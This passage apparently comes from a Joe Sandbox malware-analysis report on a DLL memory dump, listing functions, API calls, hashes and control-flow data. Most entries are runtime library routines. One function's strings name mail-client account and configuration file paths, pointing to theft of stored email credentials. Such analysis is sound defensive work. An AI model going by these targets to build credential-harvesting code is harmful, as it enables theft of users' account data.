                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                                                                            Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 492 10008862-10008886 MultiByteToWideChar 489->492 493 10008857-1000885f 489->493 490->489 497 1000884e 490->497 495 10008a19-10008a2c call 10002ada 492->495 496 1000888c-10008898 492->496 493->492 498 1000889a-100088ab 496->498 499 100088ec 496->499 497->489 502 100088ca-100088db call 100056d0 498->502 503 100088ad-100088bc call 1000bf20 498->503 501 100088ee-100088f0 499->501 505 100088f6-10008909 MultiByteToWideChar 501->505 506 10008a0e 501->506 502->506 513 100088e1 502->513 503->506 516 100088c2-100088c8 503->516 505->506 510 1000890f-1000892a call 10005f19 505->510 511 10008a10-10008a17 call 10008801 506->511 510->506 520 10008930-10008937 510->520 511->495 517 100088e7-100088ea 513->517 516->517 517->501 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 523 100089c9 521->523 524 1000897f-10008990 521->524 522->511 525 10008944-10008946 522->525 528 100089cb-100089cd 523->528 526 10008992-100089a1 call 1000bf20 524->526 527 100089ab-100089bc call 100056d0 524->527 525->506 529 1000894c-10008966 call 10005f19 525->529 532 10008a07-10008a0d call 10008801 526->532 540 100089a3-100089a9 526->540 527->532 542 100089be 527->542 528->532 533 100089cf-100089e8 call 10005f19 528->533 529->511 544 1000896c 529->544 532->506 533->532 545 100089ea-100089f1 533->545 546 100089c4-100089c7 540->546 542->546 544->506 547 100089f3-100089f4 545->547 548 10008a2d-10008a33 545->548 546->528 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->532 550 10008a35-10008a3c call 10008801 549->550 550->511
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                                                                            Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                                                            • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1922816806-0
                                                                                                                                                                                                                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                                                                            Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3594823470-0
                                                                                                                                                                                                                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                                                                            Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                                                                            Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                            • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                                            • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                                                                            Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                            • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                                                            Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                                                            Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                                                            Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                                                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                                                            Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 493641738-0
                                                                                                                                                                                                                                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                                                                            Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009206
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009218
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                                                                            Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100053B6
